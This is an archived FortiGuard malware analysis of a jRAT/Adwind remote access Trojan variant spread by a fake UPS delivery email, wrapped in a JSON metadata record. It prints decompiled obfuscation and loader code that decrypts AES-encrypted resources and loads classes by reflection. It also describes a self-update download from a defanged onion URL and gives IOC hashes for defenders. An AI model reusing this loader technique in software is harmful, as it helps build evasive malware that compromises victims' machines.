{
	"id": "262b3acd-daa9-46f8-b3b5-9177c577b88d",
	"created_at": "2026-04-06T00:13:11.204553Z",
	"updated_at": "2026-04-10T13:12:13.720652Z",
	"deleted_at": null,
	"sha1_hash": "8b30187ae1260b20c2e0a899f65d20dbbc0bc86a",
	"title": "New jRAT/Adwind Variant Being Spread With Package Delivery Scam",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1125020,
	"plain_text": "New jRAT/Adwind Variant Being Spread With Package Delivery\r\nScam\r\nBy Xiaopeng Zhang\r\nPublished: 2018-02-16 · Archived: 2026-04-05 12:51:48 UTC\r\nAt the beginning of February 2018, FortiGuard Labs collected a malicious email with the subject “UPS\r\nDELIVERY UPDATE”, as shown in Figure 1. Phishers and scammers traditionally misuse the names of well-known organizations and individuals in order to make their malicious messages seem legitimate, allowing them to\r\nmore easily trick unsuspecting victims. This email message contains a fake order tracking number with a bogus\r\nhyperlink that, rather than connecting the user to a legitimate website, downloads a jar malware. After a quick\r\nanalysis, I was able to determine that this malware is jRAT/Adwind.\r\njRAT (also called Adwind) is a commercial cross-platform remote access Trojan that is written in Java. It is\r\ndesigned to control and collect data from a victim’s machine regardless of whether it is running Windows, Linux,\r\nMac OS X, or BSD. While jRAT is not very new, it keeps upgrading its technology. In this blog, I will show you\r\nhow this variant that we collected works on a Windows system.\r\nDownloading the jRAT malware from the hyperlink\r\nFigure 1 shows the content of the fake UPS email. The hyperlink on the order tracking number points to the\r\nmalware download page “hxxp://upsshippingilabel.4pu.com/”. Note that a real UPS tracking link should be in this\r\nformat: \"hxxp://www.ups.com/WebTracking/processInputRequest?\r\nloc=en_US\u0026Requester=NES\u0026tracknum=1Z5F606X123456789”.\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 1 of 15\n\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 2 of 15\n\nFigure 1. Fake UPS shipment notice\r\nFigure 2. Downloading the jRAT malware in IE\r\nAs you can see from Figure 2, the downloaded file is named “upslabels.jar”.\r\nA Jar file is a Java package format file that can be executed by a Java.exe program. This means that to get this\r\nmalware running, the victim has to have installed the Java running environment on his system.\r\nStatic analysis of the upslabels.jar file (the parent-jar)\r\nWhen dragging the jar file into a Java static analysis tool, it’s obvious that it uses obfuscation technology to\r\nprotect it from being easily analyzed. The package names, class names, function names, field names, and resource\r\nnames are all random strings. It even could bypass the JD-GUI tool because the jar’s entry function - main\r\nfunction is decompiled as empty in the tools. Figure 3 shows the view of “usplabels.jar” in an analysis tool.\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 3 of 15\n\nFigure 3. Random names and empty main function in JD-GUI\r\nI was able to decompile the jar file into Java source code so I could debug the source code in Eclipse. BTW, when\r\nthe upslabels.jar starts, it drops another jar file. So I call the upslabels.jar the parent-jar. It is actually like a packer\r\nfor PE files. I then call the dropped jar file the main-jar.\r\nTo make it hard to be analyzed, all the constant strings in it are split and defined into many different classes, all of\r\nwhich will be concatenated during runtime. Below are two code snippets displaying how the split strings are\r\ndefined, and how one split string is concatenated.\r\npublic class Unmedaled\r\n{\r\n[…]\r\n public static void hayneTech()\r\n {\r\n Unpeg.difdaBruzz = \"com.oofiest.flatterer.Shreds.get\";\r\n Unpeg.noxChoop = \"BuggyAlogy(), com.\";\r\n Unpeg.corrBlimy = \"miesFubs(), com.ch\";\r\n Unpeg.jismDupe = \"stils.Un\";\r\n Unpeg.mhoAevum = \"m.cholle\";\r\n Unpeg.thyselBazar = \"AES\";\r\n Unpeg.mendeeHunh = \"AES\";\r\n Unpeg.boohooTalked = \"\\0002216ca4\";\r\n Unpeg.rebelWasir = \"st/oe\";\r\n Unpeg.pnyxLwo = \"l.Jrat\";\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 4 of 15\n\n}\r\n}\r\npublic class NeukBons\r\n{\r\n[…]\r\n public static void huminEntr()\r\n {\r\n Unpeg.dartreJazy = (new StringBuilder()).append(Unpeg.difdaBruzz).append(Unpeg.simasHaul).append(Unpeg.pinda\r\n }\r\n}\r\nPart of the split strings will be combined as Java code to be executed later by a ScriptEngine object by calling its\r\neval function. It also attempts to hide the keyword code. Below is an example of calling eval function:\r\npublic static void unrowWote() throws ScriptException\r\n{\r\n AeacusAdm.abyChm.eval(Unpeg.keltsKru);\r\n}\r\n \r\n“AeacusAdm.abyChm” is a ScriptEngine object. “Unpeg.keltsKru” is a String type variable that holds the\r\nconcatenated string of\r\n“com.oofiest.RectaSeers.pedeeGunsel=com.choller.pastils.Unpeg.getAtaPawls().getBytes();”, which is then\r\nexecuted in the AeacusAdm.abyChm.eval function. The result is an AES key used to decrypt other classes, so the\r\nkey is saved in the variable com.oofiest.RectaSeers.pedeeGunsel with the value [0, 50, 50, 49, 54, 99, 97, 52, 51,\r\n55, 98, 52, 52, 52, 53, 0].\r\nThis variant also contains a lot of resource files (see the file list in Figure 3), which are encrypted. The parent-jar\r\nreads and decrypts them, and then some of them will be combined as Java class files, constant strings, or URL\r\nstrings.\r\nDynamic analysis of the upslabels.jar file\r\nNext, I will provide more details about how this variant works chronologically.\r\nWhen started with Java.exe, this variant sets up two JVM global properties, \"q.main-class\"-\u003e\"operational.Jrat\" and\r\n\"q.encryptedPathsPath\"-\u003e\"/com/choller/LidoMath\", by calling the System.setProperty function. The value of the\r\nproperty “q.main-class” is retrieved later in a dynamically generated class to load the main class. The value of the\r\nproperty “q.encryptedPathsPath” is \"/com/choller/LidoMath\", which is the first element of an encrypted resource\r\nchain.\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 5 of 15\n\nFigure 4. Calling System.setProperty\r\nIt then loads data from a resource file and decrypts it using the AES algorithm to get a class file. It will be a\r\ndynamic class to be loaded as “qeaqtor.Loader” by calling the  ClassLoader.defineClass method. Figure 5 shows\r\nthe main steps to loading dynamic class “qeaqtor.Loader”. I added comments to the code for better understanding.\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 6 of 15\n\nFigure 5. Load dynamic class qeaqtor.Loader\r\nAfter that, the “Loader” class in package “qeaqtor” is ready to be used. It contains four methods: bytes, criminal,\r\ngo and resource. Only go is declared as “public static”. The go method is the entry method of this class. It’s\r\nobtained from the result of calling qeaqtor.Loader.class.getMethods() and returns with a method array, the first of\r\nwhich is method go. I dumped the class to a local file and then decompiled it, so in the snippet below you can see\r\nhow the class qeaqtor.Loader and its member variables are declared, as well as the code of method go.\r\npackage qeaqtor;\r\nimport Java.io.ByteArrayInputStream;\r\nimport Java.io.ByteArrayOutputStream;\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 7 of 15\n\nimport Java.io.DataInputStream;\r\nimport Java.io.InputStream;\r\nimport Java.io.ObjectInputStream;\r\nimport Java.lang.reflect.Method;\r\nimport Java.util.LinkedHashMap;\r\nimport Java.util.zip.GZIPInputStream;\r\nimport Javax.crypto.Cipher;\r\nimport Javax.crypto.spec.SecretKeySpec;\r\n \r\npublic class Loader\r\n{\r\n public static final String[] qeaqtor_resources = { \"/qeaqtor/Loader.class\", \"/qeaqtor/URLStreamHandler.class\",\r\n static String _main_class;\r\n static String _encryptedPathsPath;\r\n public static String entryKey = \"0123456789012345\";//AES key\r\n static Class bootsrapClass;\r\n static LinkedHashMap\u003cString, byte[]\u003e criminals;\r\n static LinkedHashMap\u003cString, String[]\u003e paths;\r\n \r\n public static void go(Class bootsrapClass, String[] args) throws Throwable\r\n {\r\n if (args == null) {args = new String[0];}\r\n \r\n _main_class = System.getProperty(\"q.main-class\");\r\n _encryptedPathsPath = System.getProperty(\"q.encryptedPathsPath\");\r\n \r\n if (_main_class == null)\r\n return;\r\n ByteArrayOutputStream mainBaos = new ByteArrayOutputStream();\r\n \r\n DataInputStream dis; InputStream is;\r\n String nextPath = _encryptedPathsPath;\r\n for (;;){\r\n is = bootsrapClass.getResourceAsStream(nextPath);\r\n if (is == null) break;\r\n ByteArrayOutputStream baos = new ByteArrayOutputStream();\r\n int readed;\r\n byte[] buffer = new byte[1024];\r\n while ((readed = is.read(buffer)) \u003e -1)\r\n baos.write(buffer, 0, readed);\r\n byte[] encbytes = baos.toByteArray();\r\n Cipher cipher = Cipher.getInstance(\"AES\");\r\n cipher.init(2, new SecretKeySpec(entryKey.getBytes(\"UTF-8\"), \"AES\"));\r\n encbytes = cipher.doFinal(encbytes);\r\n is = new ByteArrayInputStream(encbytes);\r\n dis = new DataInputStream(is);\r\n nextPath = dis.readUTF();\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 8 of 15\n\nwhile ((readed = dis.read(buffer)) \u003e -1)\r\n mainBaos.write(buffer, 0, readed);\r\n }\r\n ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(mainBaos.toByteArray()));\r\n paths = (LinkedHashMap)ois.readObject();\r\n criminals = (LinkedHashMap)ois.readObject();\r\n ois.close();\r\n \r\n ClassLoader cl = bootsrapClass.getClassLoader();\r\nMethod defineClass = ClassLoader.class.getDeclaredMethod(\"defineClass\",\r\n new Class[] {\r\n String.class,\r\n byte[].class,\r\n Integer.TYPE,\r\n Integer.TYPE }\r\n );\r\n \r\n defineClass.setAccessible(true);\r\n String res[] = qeaqtor_resources;\r\n Class last = null;\r\n int i = 0; i = res.length;\r\n for (int j = 0; j \u003c i;) {\r\n String qc = res[j];\r\n if ((i++ == 0) || !qc.endsWith(\".class\"))\r\n continue;\r\n \r\n is = null;\r\n try {\r\n String canname = qc.replace('/', '.');\r\n canname = canname.substring(1, canname.length() - 6);\r\n byte[] bytes = resource(qc);\r\n if ((last = (Class)defineClass.invoke(cl, new Object[] { canname, bytes, Integer.valueOf(0), Integer\r\n return;\r\n \r\n try {is.close();} catch (Throwable localThrowable2) {}\r\n j++;\r\n }\r\n catch (Throwable t) { return; }\r\n finally{\r\n try {is.close();}\r\n catch (Throwable localThrowable4) {}\r\n }\r\n }\r\n if (last == null) {return;}\r\n last.getMethod(\"go\", new Class[] { String[].class })\r\n .invoke(null, new Object[] { args });\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 9 of 15\n\n}\r\n[…]\r\nHere it reads out \"/com/choller/LidoMath\" by calling function System.getProtperty() from the JVM global\r\nproperty \"q.encryptedPathsPath\". As I said above, this is the first element in a resource chain. It is a path to the\r\nAES encrypted resource file. After decrypting its content and calling nextPath = dis.readUTF(); it gets the next\r\nresource’s path from the decrypted data. It also reads another global property value into the Loader class variable\r\n_main_class that is used in the following dynamic loaded class.\r\nFigure 6 is the screenshot of the partially decrypted data. You can see \"/com/choler/BayaFinn\" will be the next one\r\nin the resource chain. \r\nFigure 6. Decrypted resource \"/com/choller/LidoMath\"\r\nIn this way, it can load all resources in the resource chain and then put the decrypted data together into a mainBaos\r\nobject.\r\nActually, the final data could make a LinkedHashMap object, as it reads all data into a LinkedHashMap object\r\nLoader.paths. From a Java document, the class is defined as “Class LinkedHashMap\u003cK,V\u003e”. This class contains\r\ntwo members, Key and Value. You get the Value by Key calling its get() function. In this case, the Value consists\r\nof the resource path and AES decryption key. In the following steps, using this LinkedHashMap object, the\r\nmalware can read and decrypt a number of resource files, including URL, more dynamic class files, and the\r\ndropped working jar file.\r\nFigure 7 shows one pair of K and V from the object paths. It contains 122 pairs of K and V.\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 10 of 15\n\nFigure 7. View of LinkedHashMap object paths\r\nLoader class has a class member qeaqtor_resources declared as the following:\r\npublic static final String[] qeaqtor_resources\r\n= {\"/qeaqtor/Loader.class\", \"/qeaqtor/URLStreamHandler.class\", \"/qeaqtor/URLStreamHandlerFactory.class\", \"/qeaqt\r\nIt’s a string array containing five strings, all of which are Keys in the paths object. The next step in the go method\r\nis to load all of these classes except for the first one (it has already been loaded.). Through paths.get() we get the\r\ncorresponding resource path and AES decryption key to decrypt the resource loaded into JVM as class, just like\r\nloading the Loader class. At the bottom of this function, it calls the last loaded class’s go() method by calling\r\ngetMethod(“go”…) and invoke(). The last loaded class is “/qeaqtor/Header.class”, which I also dumped to a local\r\nfile for further analysis.\r\nLet’s move forward to see what Header.go method does. It calls the Loader.crimina(\"smart-qrypt-address\");\r\nmethod to get a URL. Here “smart-qrypt-address\" is a Key in Loader.paths. It ends up with the URL string\r\n\"hxxps://vvrhhhnaijyj6s2m.onion.top/storage/cryptOutput/0.81189400 1517566981.jar\". It then accesses this URL\r\nand downloads a new file to replace the current parent-jar and run it. In short, it upgrades itself every time it starts.\r\nFigure 8, below, contains the code snippet.\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 11 of 15\n\nFigure 8. Upgrades itself every time it starts up\r\nThe Header.go method continues to load the dynamic class whose name is in Loader._main_class, i.e.\r\n“operational.Jrat\". It is formatted as “criminal/0/operational/Jrat.class“. No doubt, it’s a Key to Loader.paths as\r\nwell. The resource file for this Key is “/com/choller/britchka/HiantPfc“. Decrypting it can get a class file, and then\r\nthe “operational.Jrat” class is loaded dynamically into this JVM. Below is the related code snippet.\r\n \r\nObject brother = new URLClassLoader(urls);\r\n \r\nClass sister = ((ClassLoader)brother).loadClass(Loader._main_class);\r\n \r\nsister.getMethod(\"main\", new Class[] { String[].class }).invoke(null, new Object[] { args });\r\nFinally, the function operational.Jrat.main will be called through calling invoke.\r\nThe purpose of the Jrat.main function is to drop another jar file into the system temp folder, which will take\r\ncontrol to perform the actual malicious actions on the victim’s system. It is the main-jar file. Similarly the main-jar file is encrypted and split into different resource files. It can be restored through the Loader.paths. Figure 9,\r\nbelow, is the code snippet of operation.Jrat.main that tells how the main-jar is restored and run up.\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 12 of 15\n\nFigure 9. Run main-jar up\r\nHere is a view of the overall flow chart of what upslabels.jar does.\r\nFigure 10. The overall flow chart of upslabels.jar execution\r\nWhen the main-jar runs, it adds itself into the startup group in the system registry so that it will be run whenever\r\nthe system starts. It also covertly runs two VBS scripts from the system temp folder to get the installed AntiVirus\r\nand Firewall products on the system. Figure 11 shows the process tree in Process Monitor when upslabels.jar runs.\r\nFigure 11. Process tree when running upslabels.jar\r\nSo far, I’m still working on analyzing the dropped main-jar.\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 13 of 15\n\nDuring my analysis, we also observed that there were many different jRAT variants captured in our malware\r\ncollection system. The list below is a partial listing of them.\r\nD15DE96E4E287377491AAD6C29201F5D|Order_2018.jar\r\nAB679F467A773BB14E8C5812102DBCF5|Order_2018.jar\r\nAAF35F7D8C5D12BA595800287176336B|1Z2959990312036034.jar\r\nC66E26C585BA64AF4EE234787694B44C|Order_2018.jar\r\nAD63F38A172367CE5A0919A04968030E|Order_2018.jar\r\n212DD73E8896DA5F5F37E67A38B546FC|Order_2018.jar\r\nC87C87BAA62143EC219A204FA3AA2E48|Payment details.jar\r\n632AEFADDD6005C4F85616CDEA6BEE74|DOC0.14538400 1.jar\r\n15B9AE21D412ED477619F6E7B3CC43F6|Document.jar\r\n2395E2D206D002203965CF9C1D38906C|SOA.jar\r\n5FB5E4E13620DC2EC0B2D4E1F5E2B099|Order_2018.jar\r\n5E1D0FAAA0561E63069D26F69B8AB552|Order_2018.jar\r\n7454B206D9F8BDD0F99F8365E278A214|Invoice.jar\r\nDDFBFBE75F00047B6AA7129950A16CD8|New Order.jar\r\nSolution\r\nThe FortiGuard Antivirus service has detected the file \"upslabels.jar\" as Java/Adwind.AAV!tr. The jar download\r\nURL has been rated as Malicious Websites by the FortiGuard Webfilter service.\r\nIOC\r\nURL list:\r\nhxxp://upsshippingilabel.4pu.com/\r\nhxxps://vvrhhhnaijyj6s2m.onion.top/storage/cryptOutput/0.81189400 1517566981.jar\r\nSample SHA-256 hashes:\r\nupslabels.jar\r\n02A47E7FDFF641C9DE851D8434E4627E3E2BFB20FD0D776E8528DC719039AC36\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 14 of 15\n\nSign up for our weekly FortiGuard intel briefs or to be a part of our open beta of Fortinet’s FortiGuard Threat\r\nIntelligence Service.\r\nSource: https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nhttps://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html"
	],
	"report_names": [
		"new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434391,
	"ts_updated_at": 1775826733,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8b30187ae1260b20c2e0a899f65d20dbbc0bc86a.pdf",
		"text": "https://archive.orkl.eu/8b30187ae1260b20c2e0a899f65d20dbbc0bc86a.txt",
		"img": "https://archive.orkl.eu/8b30187ae1260b20c2e0a899f65d20dbbc0bc86a.jpg"
	}
}